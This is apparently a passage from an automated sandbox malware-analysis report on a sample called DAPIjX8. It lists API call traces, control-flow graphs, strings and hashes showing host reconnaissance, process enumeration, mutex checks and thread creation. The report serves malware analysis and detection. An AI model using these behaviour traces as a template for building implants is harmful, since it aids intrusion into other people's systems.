                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C7233F8), ref: 6C63345C
                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6C7233F8), ref: 6C633477
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7233F8), ref: 6C633484
                                  • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7233F8), ref: 6C633494
                                  • _memmove.LIBCMT ref: 6C6334AC
                                  • HeapCreate.KERNEL32(00040000,-000000C9,00000000), ref: 6C6334C5
                                    • Part of subcall function 6C6B2E33: _doexit.LIBCMT ref: 6C6B2E3F
                                  • RtlAllocateHeap.NTDLL(00000000,00000008,-000000C9), ref: 6C6334CF
                                  • _memmove.LIBCMT ref: 6C6334DC
                                  • GetDC.USER32(00000000), ref: 6C6334E5
                                  • EnumObjects.GDI32(00000000,00000002,00000000,00000000), ref: 6C6334F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Create$File$CloseHeap_memmove$AllocateChangeEnumErrorException@8FindH_prolog3_catch_HandleLastMutexNotificationObjectsReadSizeThreadThrow_doexit
                                  • String ID: 1wps$MyProgramMutex$_w8g
                                  • API String ID: 235313284-2654228369
                                  • Opcode ID: e9676c896e5f2a61654451018bdfca25e90714bc3cb4af48d5416c153d7ea04a
                                  • Instruction ID: 63661f15e233a3e80aed36592e1bc7f480be8395b4a6a163221eb0cc5be24555
                                  • Opcode Fuzzy Hash: e9676c896e5f2a61654451018bdfca25e90714bc3cb4af48d5416c153d7ea04a
                                  • Instruction Fuzzy Hash: 0B41B271605218BBDB116BB18C89EEF7EBCEB0A314F101524F606A7640DB319D068B7C
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 1000C311
                                  • gethostname.WS2_32(?,00000100), ref: 1000C339
                                  • gethostbyname.WS2_32(?), ref: 1000C34F
                                    • Part of subcall function 1000BB20: gethostname.WS2_32(?,00000100), ref: 1000BB53
                                    • Part of subcall function 1000BB20: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 1000BB6F
                                    • Part of subcall function 1000BB20: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 1000BBB4
                                  • LoadLibraryW.KERNEL32(10077444,10077566,00000000,10077568,10077568,10077566,00000000,00000000,00000000,-00000002,00000000,00000000), ref: 1000C83C
                                  • FreeLibrary.KERNEL32(00000000), ref: 1000C885
                                    • Part of subcall function 1000C1C0: GetTickCount.KERNEL32 ref: 1000BD7C
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000007,00000000,00000000,10077510,00000006), ref: 1000CED4
                                  • lstrcpyW.KERNEL32(1008CE80,00000000), ref: 1000CF28
                                  • wsprintfW.USER32 ref: 1000CF3F
                                  • GetFileAttributesW.KERNEL32(?), ref: 1000CFE2
                                    • Part of subcall function 1001BC50: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000001,?), ref: 1001BC87
                                    • Part of subcall function 1001CBA0: GetComputerNameW.KERNEL32(?,00000200), ref: 1001CBF5
                                    • Part of subcall function 1001CBA0: lstrcpyW.KERNEL32(?,10077510), ref: 1001CC0B
                                    • Part of subcall function 1001CBA0: wsprintfW.USER32 ref: 1001CC37
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$Librarygethostnamelstrcpywsprintf$AttributesComputerCountFileFolderFreeLoadNamePathSpecialStartupTickgethostbyname
                                  • String ID: ,$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Remark$SID$Time$l$long$x64$x86
                                  • API String ID: 4242217452-1458297535
                                  • Opcode ID: 55ff83a61d9db7206ae508621e76a6cffcc3e39af66de2d6fb2b3ad838857976
                                  • Instruction ID: 9d0cd7843b54b44ededa8168ed05449c303563adff5c25b9c2a1c632e16138b0
                                  • Opcode Fuzzy Hash: 55ff83a61d9db7206ae508621e76a6cffcc3e39af66de2d6fb2b3ad838857976
                                  • Instruction Fuzzy Hash: 37E2D470D00A589AEB64CB24CC85BEEB772EF45346F1082D9E049A7296DB756FC4CF60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1242 6c63b1de-6c63b228 call 6c650908 call 6c6b1f84 * 2 1250 6c63b247-6c63b253 call 6c6b330e 1242->1250 1251 6c63b22a-6c63b22d 1242->1251 1258 6c63b255-6c63b258 1250->1258 1259 6c63b278-6c63b285 call 6c6b330e 1250->1259 1253 6c63b242-6c63b245 1251->1253 1254 6c63b22f-6c63b234 1251->1254 1253->1250 1257 6c63b238-6c63b23f 1253->1257 1254->1251 1256 6c63b236 1254->1256 1256->1253 1257->1250 1260 6c63b241 1257->1260 1258->1259 1261 6c63b25a-6c63b275 call 6c650908 call 6c6b1f84 1258->1261 1266 6c63b287-6c63b28a 1259->1266 1267 6c63b2aa-6c63b2b3 call 6c6b330e 1259->1267 1260->1253 1261->1259 1266->1267 1270 6c63b28c-6c63b2a7 call 6c650908 call 6c6b1f84 1266->1270 1274 6c63b2b5-6c63b2b8 1267->1274 1275 6c63b2d8-6c63b300 call 6c650908 call 6c6b1f84 call 6c676956 1267->1275 1270->1267 1274->1275 1277 6c63b2ba-6c63b2d5 call 6c650908 call 6c6b1f84 1274->1277 1289 6c63b305-6c63b31d call 6c6b1f75 1275->1289 1277->1275
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _sprintf$__wgetenv$__output_l
                                  • String ID: %s%s$7.10$ASTR$ASTROLOG$C:\Astrolog
                                  • API String ID: 2520948663-3225433610
                                  • Opcode ID: 29829f03ae9fbdc3dde6dfa4149e4a4755a06c01d3c522681e3a3aa7a989588c
                                  • Instruction ID: 3fa5e0fac7b6f8945b37150ac491f77f077e38bc12e5ae00d29eb444c796abf8
                                  • Opcode Fuzzy Hash: 29829f03ae9fbdc3dde6dfa4149e4a4755a06c01d3c522681e3a3aa7a989588c
                                  • Instruction Fuzzy Hash: C731FBB19049D8AAEB00D6A5DC54FFF37AC9F8330CF2025A59855EBA51EF308598C72C

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1671 1001ee00-1001ef24 call 1003b910 * 3 LoadLibraryW RegOpenKeyExW 1683 1001ef34-1001ef3b 1671->1683 1684 1001ef26-1001ef2f 1671->1684 1685 1001f130-1001f144 call 1001f177 1683->1685 1686 1001ef41 1683->1686 1684->1685 1696 1001f146-1001f147 FreeLibrary 1685->1696 1697 1001f14d-1001f16a call 10038bd3 1685->1697 1686->1685 1688 1001f095-1001f0bb RegQueryValueExW 1686->1688 1689 1001efa4-1001efd1 1686->1689 1690 1001f037-1001f064 1686->1690 1691 1001ef48-1001ef75 RegQueryValueExW 1686->1691 1694 1001f0c8-1001f0f3 call 10039180 RegQueryValueExW 1688->1694 1695 1001f0bd-1001f0c6 1688->1695 1689->1685 1706 1001efd7-1001efdd 1689->1706 1690->1685 1703 1001f06a-1001f090 wsprintfW 1690->1703 1691->1685 1693 1001ef7b-1001ef81 call 1001ed90 1691->1693 1704 1001ef86-1001ef9f lstrcpyW 1693->1704 1709 1001f0f5-1001f107 call 100391ac 1694->1709 1710 1001f109-1001f11d 1694->1710 1695->1685 1696->1697 1703->1685 1704->1685 1708 1001efe3-1001efed 1706->1708 1712 1001f019-1001f032 lstrcpyW 1708->1712 1713 1001efef-1001effe 1708->1713 1711 1001f11f-1001f125 1709->1711 1710->1711 1711->1685 1712->1711 1717 1001f001-1001f00b 1713->1717 1718 1001f012-1001f017 1717->1718 1719 1001f00d-1001f010 1717->1719 1718->1708 1719->1717
                                  APIs
                                  • LoadLibraryW.KERNEL32(100782C8,?,?,?,?,?,10081068,00000001,Remark), ref: 1001EE9F
                                  • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,?,?,10081068,00000001,Remark), ref: 1001EF1C
                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,10081068,00000001,Remark), ref: 1001F147
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Library$FreeLoadOpen
                                  • String ID: Remark
                                  • API String ID: 3518234908-3865500943
                                  • Opcode ID: f0ac16730cc1bbeac4a56bd6364e2f2ca9246a11b390f576fc7b0e8c0857bdd6
                                  • Instruction ID: 4280bcdcbe3d8e76b3a2d985dd6de93ce3b6678e1cecf0cba3b117d83fd6403a
                                  • Opcode Fuzzy Hash: f0ac16730cc1bbeac4a56bd6364e2f2ca9246a11b390f576fc7b0e8c0857bdd6
                                  • Instruction Fuzzy Hash: 5F913AB1D04228ABEB21DF64CC44BDEB7B9FB44714F0041EAEA4CA7251DB719E858F58

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1720 6c63bca4-6c63bcaa 1721 6c63bd51-6c63bd63 1720->1721 1722 6c63bcb0-6c63bce2 1720->1722 1725 6c63bd66-6c63bd69 1721->1725 1723 6c63bd10 1722->1723 1724 6c63bce4-6c63bd0e call 6c679261 1722->1724 1727 6c63bd12-6c63bd18 1723->1727 1724->1727 1728 6c63bd6d-6c63bd76 1725->1728 1730 6c63bd31-6c63bd37 1727->1730 1731 6c63bd1a-6c63bd2b 1727->1731 1732 6c63bd78-6c63bd7a 1728->1732 1733 6c63bd7f-6c63bd82 1728->1733 1736 6c63bd40-6c63bd46 1730->1736 1737 6c63bd39 1730->1737 1731->1730 1732->1733 1738 6c63bd7c-6c63bd7d 1732->1738 1734 6c63bd84-6c63bd89 1733->1734 1735 6c63bd8b-6c63bd8e 1733->1735 1740 6c63bdd1-6c63bddc call 6c6b1f84 1734->1740 1741 6c63bd90-6c63bd95 1735->1741 1742 6c63bd97-6c63bd9a 1735->1742 1736->1725 1743 6c63bd48-6c63bd4f 1736->1743 1737->1736 1739 6c63bde5-6c63bdf3 call 6c6b1f84 1738->1739 1752 6c63bdf6-6c63be14 call 6c680679 1739->1752 1740->1752 1741->1740 1745 6c63bda3-6c63bda6 1742->1745 1746 6c63bd9c-6c63bda1 1742->1746 1743->1725 1750 6c63bda8-6c63bdad 1745->1750 1751 6c63bdaf-6c63bdb2 1745->1751 1746->1740 1750->1740 1753 6c63bdb4-6c63bdb9 1751->1753 1754 6c63bdbb-6c63bdbe 1751->1754 1758 6c63be19-6c63be23 1752->1758 1753->1740 1756 6c63bdc0-6c63bdc5 1754->1756 1757 6c63bdc7-6c63bdca 1754->1757 1756->1740 1759 6c63bdde 1757->1759 1760 6c63bdcc 1757->1760 1761 6c63bf55-6c63bf98 call 6c680847 1758->1761 1762 6c63be29-6c63be68 call 6c650b5b 1758->1762 1759->1739 1760->1740 1769 6c63bf9f-6c63bfa3 1761->1769 1767 6c63be85-6c63becf call 6c63862e 1762->1767 1768 6c63be6a-6c63be70 1762->1768 1776 6c63bed1-6c63bee1 1767->1776 1777 6c63bf1a 1767->1777 1768->1767 1770 6c63be72-6c63be7e 1768->1770 1772 6c63bd6b 1769->1772 1773 6c63bfa9-6c63bfb7 call 6c6b1f75 1769->1773 1770->1767 1772->1728 1776->1777 1779 6c63bee3-6c63bee9 1776->1779 1780 6c63bf21-6c63bf45 1777->1780 1781 6c63bef3 1779->1781 1782 6c63beeb-6c63bef1 1779->1782 1783 6c63bf47 1780->1783 1784 6c63bf4c-6c63bf53 1780->1784 1785 6c63bef9-6c63bf18 call 6c6d6d20 1781->1785 1782->1785 1783->1784 1784->1769 1785->1780
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _sprintf
                                  • String ID: ,M31$,beCru$,ze-1Ret$@$Alnilam$Kaus Australis$Pleione$Rigil Kentaurus
                                  • API String ID: 1467051239-1042911856
                                  • Opcode ID: f691c0b619136dca5986968611e31e26a7200205534e20dcc3e4ae1606e6672a
                                  • Instruction ID: 9f373ea48e79f0021f90be5d4789960f9d03a18a97589d051bbde0cc606da12e
                                  • Opcode Fuzzy Hash: f691c0b619136dca5986968611e31e26a7200205534e20dcc3e4ae1606e6672a
                                  • Instruction Fuzzy Hash: 1281D671A0491EDADF11AF64E8855D877B4FB8B308F81A5FED0DD52850DB3186A8CB0C

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1788 1000dbd0-1000dbef 1790 1000dbf1-1000dbf3 1788->1790 1791 1000dbf5-1000dc05 1788->1791 1792 1000dc1e-1000dc3d call 1001cba0 1790->1792 1793 1000dc0d-1000dc0f 1791->1793 1800 1000dcae-1000dcb5 1792->1800 1801 1000dc3f-1000dca3 call 100425aa call 1004287d call 1003b910 wsprintfW call 1001cae0 1792->1801 1796 1000dc11-1000dc16 1793->1796 1797 1000dc1c 1793->1797 1796->1797 1798 1000dc18-1000dc1a 1796->1798 1797->1792 1798->1792 1806 1000dcc4-1000dcdc CreateMutexW GetLastError 1800->1806 1807 1000dcb7-1000dcc2 1800->1807 1822 1000dca8 1801->1822 1808 1000dcf8-1000dd2e call 1003b910 GetComputerNameW 1806->1808 1809 1000dcde-1000dcf7 CloseHandle call 10038bd3 1806->1809 1807->1806 1818 1000dd30-1000dd3c lstrcpyW 1808->1818 1819 1000dd42-1000ddb0 call 1003b910 wsprintfW call 1001ee00 1808->1819 1818->1819 1826 1000ddb2-1000ddd5 call 1001ee00 1819->1826 1827 1000dddd-1000dde5 1819->1827 1822->1800 1831 1000ddda 1826->1831 1829 1000de07-1000de11 call 1001f9a0 call 1001cba0 1827->1829 1830 1000dde7-1000ddef 1827->1830 1839 1000de16-1000de1d 1829->1839 1830->1829 1832 1000ddf1-1000ddf6 1830->1832 1831->1827 1832->1829 1834 1000ddf8-1000de04 call 1003ae10 1832->1834 1834->1829 1841 1000de49-1000de5e call 10038bd3 1839->1841 1842 1000de1f-1000de30 call 100424b6 1839->1842 1842->1841 1847 1000de32-1000de34 1842->1847 1848 1000de36-1000de39 1847->1848 1849 1000de3b-1000de43 1847->1849 1848->1841 1848->1849 1849->1841
                                  APIs
                                  • wsprintfW.USER32 ref: 1000DC8F
                                  • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 1000DCC9
                                  • GetLastError.KERNEL32 ref: 1000DCD1
                                  • CloseHandle.KERNEL32(00000000), ref: 1000DCDF
                                  • GetComputerNameW.KERNEL32(?,00000200), ref: 1000DD26
                                  • lstrcpyW.KERNEL32(?,10077510), ref: 1000DD3C
                                  • wsprintfW.USER32 ref: 1000DD68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: wsprintf$CloseComputerCreateErrorHandleLastMutexNamelstrcpy
                                  • String ID: Time$long$tasktime
                                  • API String ID: 172913010-2011194240
                                  • Opcode ID: 18c389d78b71260914e67dd970c387743a4d043c92a2ccdab54cdcf64fc39b9a
                                  • Instruction ID: fdbe4bd0be62d1fc7a4c7fa3e0aaac4247286d7f8c664be7a572e76097edb7d8
                                  • Opcode Fuzzy Hash: 18c389d78b71260914e67dd970c387743a4d043c92a2ccdab54cdcf64fc39b9a
                                  • Instruction Fuzzy Hash: 7461BA75A00219ABFB24EB64CD85F9E73ADEF40340F110596F709E6182DF74AA84CBA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1877 1000b4b0-1000b4f3 1878 1000b683-1000b6db call 1000a360 1877->1878 1879 1000b4f9-1000b52c call 1003b910 call 1003a765 1877->1879 1889 1000b6e1-1000b701 1878->1889 1890 1000b82b-1000b830 1878->1890 1887 1000b532-1000b53e 1879->1887 1888 1000b625-1000b639 call 1003a765 1879->1888 1891 1000b540-1000b577 CreateToolhelp32Snapshot call 10038be4 Process32FirstW 1887->1891 1905 1000b647-1000b65f 1888->1905 1906 1000b63b-1000b640 1888->1906 1903 1000b703-1000b723 1889->1903 1904 1000b729-1000b737 1889->1904 1893 1000b832-1000b834 1890->1893 1894 1000b838-1000b83d 1890->1894 1909 1000b579-1000b588 lstrcmpiW 1891->1909 1910 1000b5bb-1000b5da CloseHandle call 10038c14 1891->1910 1893->1894 1898 1000b845-1000b84a 1894->1898 1899 1000b83f-1000b841 1894->1899 1900 1000b852-1000b856 1898->1900 1901 1000b84c-1000b84e 1898->1901 1899->1898 1907 1000b885-1000b893 call 1000fed0 1900->1907 1908 1000b858-1000b883 call 1000a360 1900->1908 1901->1900 1903->1890 1903->1904 1912 1000b740-1000b742 1904->1912 1911 1000b662-1000b66b 1905->1911 1906->1905 1929 1000b898-1000b8ce 1907->1929 1908->1929 1916 1000b5b5-1000b5b8 1909->1916 1917 1000b58a-1000b594 Process32NextW 1909->1917 1926 1000b5f8-1000b61c call 1003a765 1910->1926 1927 1000b5dc-1000b5f1 1910->1927 1911->1911 1913 1000b66d-1000b67e call 1000a360 1911->1913 1912->1890 1920 1000b748-1000b765 1912->1920 1932 1000b997-1000b9b3 call 10038bd3 1913->1932 1916->1910 1917->1910 1925 1000b596-1000b5a5 lstrcmpiW 1917->1925 1920->1890 1939 1000b76b-1000b77e 1920->1939 1925->1916 1930 1000b5a7-1000b5b1 Process32NextW 1925->1930 1926->1891 1948 1000b622 1926->1948 1927->1926 1934 1000b8d0-1000b8dc 1929->1934 1935 1000b927-1000b929 1929->1935 1930->1925 1936 1000b5b3 1930->1936 1943 1000b913-1000b923 1934->1943 1944 1000b8de-1000b8f0 1934->1944 1940 1000b961-1000b967 1935->1940 1941 1000b92b-1000b931 1935->1941 1936->1910 1939->1894 1946 1000b784-1000b78a 1939->1946 1940->1932 1949 1000b969-1000b97b 1940->1949 1941->1940 1947 1000b933-1000b945 1941->1947 1943->1935 1950 1000b8f2-1000b900 1944->1950 1951 1000b906-1000b910 call 10038c14 1944->1951 1953 1000b790-1000b7a6 1946->1953 1954 1000b957-1000b95e call 10038c14 1947->1954 1955 1000b947-1000b955 1947->1955 1948->1888 1956 1000b98d-1000b994 call 10038c14 1949->1956 1957 1000b97d-1000b98b 1949->1957 1950->1951 1958 1000b9b4 call 100414c7 1950->1958 1951->1943 1970 1000b828 1953->1970 1971 1000b7ac-1000b7c6 1953->1971 1954->1940 1955->1954 1961 1000b9b9 call 100414c7 1955->1961 1956->1932 1957->1956 1963 1000b9be-1000b9c3 call 100414c7 1957->1963 1958->1961 1961->1963 1970->1890 1974 1000b7c8-1000b7cd 1971->1974 1975 1000b80f-1000b81d 1971->1975 1976 1000b809-1000b80c 1974->1976 1977 1000b7cf-1000b7d3 1974->1977 1975->1953 1982 1000b823-1000b826 1975->1982 1976->1975 1979 1000b7e4-1000b7ec 1977->1979 1980 1000b7d5-1000b7df call 100101a0 1977->1980 1981 1000b7f0-1000b7f9 1979->1981 1980->1979 1981->1981 1984 1000b7fb-1000b804 call 100101a0 1981->1984 1982->1894 1984->1976
                                  APIs
                                  • _wcsstr.LIBVCRUNTIME ref: 1000B51C
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000B550
                                  • Process32FirstW.KERNEL32(00000000,00000000), ref: 1000B56F
                                  • lstrcmpiW.KERNEL32(00000024,?), ref: 1000B580
                                  • Process32NextW.KERNEL32(00000000,00000000), ref: 1000B58C
                                  • lstrcmpiW.KERNEL32(00000024,?), ref: 1000B59D
                                  • Process32NextW.KERNEL32(00000000,00000000), ref: 1000B5A9
                                  • CloseHandle.KERNEL32(00000000), ref: 1000B5BC
                                  • _wcsstr.LIBVCRUNTIME ref: 1000B612
                                  • _wcsstr.LIBVCRUNTIME ref: 1000B62F
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Process32_wcsstr$Nextlstrcmpi$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 727710055-0
                                  • Opcode ID: 74624c8c618551669e3d91651b5024e9fb6ba0012caf886f3360ed4b7693b94d
                                  • Instruction ID: b2bcd0be8440f84f9ca42e084e2990dc196e099689ef7adbacb0db17711209f8
                                  • Opcode Fuzzy Hash: 74624c8c618551669e3d91651b5024e9fb6ba0012caf886f3360ed4b7693b94d
                                  • Instruction Fuzzy Hash: 6EE1AE70E00709ABEB14CFA4CC49FAEB7B5FF45784F104128F605AB295DBB5A941CB54

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1986 1001f9a0-1001f9fb call 1001cba0 1989 1001fa00-1001fa09 1986->1989 1989->1989 1990 1001fa0b-1001fa41 call 1000a360 call 1001bd50 1989->1990 1995 1001fa43-1001fa58 1990->1995 1996 1001fa78-1001fab2 1990->1996 1998 1001fa5a-1001fa68 1995->1998 1999 1001fa6e-1001fa75 call 10038c14 1995->1999 1997 1001fab8-1001fabd 1996->1997 1997->1997 2000 1001fabf-1001fac5 1997->2000 1998->1999 2001 1001fdd2 call 100414c7 1998->2001 1999->1996 2004 1001fd8b-1001fd8e 2000->2004 2005 1001facb-1001fb04 call 1003b910 SHGetSpecialFolderPathA call 10048791 2000->2005 2007 1001fdd7-1001fddf call 100414c7 2001->2007 2009 1001fd90-1001fd9b 2004->2009 2010 1001fdb7-1001fdd1 call 10038bd3 2004->2010 2022 1001fd74-1001fd85 Sleep 2005->2022 2023 1001fb0a 2005->2023 2013 1001fdad-1001fdb4 call 10038c14 2009->2013 2014 1001fd9d-1001fdab 2009->2014 2013->2010 2014->2007 2014->2013 2022->2004 2024 1001fb10-1001fb33 wsprintfA 2023->2024 2025 1001fb36-1001fb3b 2024->2025 2025->2025 2026 1001fb3d-1001fb3f 2025->2026 2027 1001fb45-1001fb63 call 10048867 2026->2027 2028 1001fd5d-1001fd6e call 10048791 2026->2028 2027->2028 2033 1001fb69-1001fb86 call 10048c3c call 10048786 2027->2033 2028->2022 2028->2024 2033->2028 2038 1001fb8c-1001fb9f call 10039180 2033->2038 2038->2028 2041 1001fba5-1001fbd5 call 10048c3c call 10048e3f call 100488f5 2038->2041 2041->2028 2048 1001fbdb-1001fbde 2041->2048 2049 1001fbe0-1001fbee 2048->2049 2050 1001fc39-1001fc3b 2048->2050 2051 1001fbf0-1001fc37 2049->2051 2052 1001fc49-1001fc4b 2050->2052 2053 1001fc3d 2050->2053 2051->2050 2051->2051 2052->2028 2055 1001fc51-1001fd0d call 10038be4 call 1003b910 call 10020230 call 10020110 CreateThread CloseHandle 2052->2055 2054 1001fc40-1001fc47 2053->2054 2054->2052 2054->2054 2055->2028 2064 1001fd0f-1001fd1f 2055->2064 2065 1001fd21-1001fd2f 2064->2065 2066 1001fd35-1001fd53 call 10038c14 2064->2066 2065->2001 2065->2066 2066->2028
                                  APIs
                                    • Part of subcall function 1001CBA0: GetComputerNameW.KERNEL32(?,00000200), ref: 1001CBF5
                                    • Part of subcall function 1001CBA0: lstrcpyW.KERNEL32(?,10077510), ref: 1001CC0B
                                    • Part of subcall function 1001CBA0: wsprintfW.USER32 ref: 1001CC37
                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,10081068,00000000,00000000), ref: 1001FAEE
                                  • wsprintfA.USER32 ref: 1001FB24
                                  • __fread_nolock.LIBCMT ref: 1001FBBE
                                  • CreateThread.KERNEL32(00000000,00000000,1001F2E0,00000000,00000000,00000000), ref: 1001FCF4
                                  • CloseHandle.KERNEL32(00000000), ref: 1001FCFB
                                  • Sleep.KERNEL32(000001F4), ref: 1001FD79
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: wsprintf$CloseComputerCreateFolderHandleNamePathSleepSpecialThread__fread_nolocklstrcpy
                                  • String ID: ARPD
                                  • API String ID: 1341197143-2799616583
